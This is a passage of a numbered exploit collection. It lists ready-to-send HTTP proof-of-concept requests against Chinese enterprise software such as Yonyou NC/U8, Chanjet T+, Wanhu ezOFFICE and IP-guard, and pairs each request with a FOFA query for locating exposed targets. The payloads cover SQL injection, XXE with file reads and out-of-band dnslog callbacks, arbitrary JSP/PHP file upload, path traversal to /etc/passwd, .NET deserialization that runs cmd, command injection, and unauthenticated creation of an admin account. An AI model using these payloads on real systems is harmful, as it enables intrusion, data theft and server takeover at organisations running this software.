Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml


43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) Socialized Business ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It runs a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform (百卓Smart管理平台) importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente customer resource management system (浙大恩特客户资源管理系统) fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the written file:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system (捷诚管理信息系统) CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate Lianaiyun all-in-one face-pass smart management platform (优卡特脸爱云一脸通智慧管理平台) 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform (万户ezOFFICE协同管理平台) SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm the vulnerability.

67. Wanhu ezOFFICE (万户ezOFFICE) wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE (万户ezOFFICE) wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE (万户 ezOFFICE) contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP (万户ezEIP) success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system (邦永PM2项目管理系统) Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
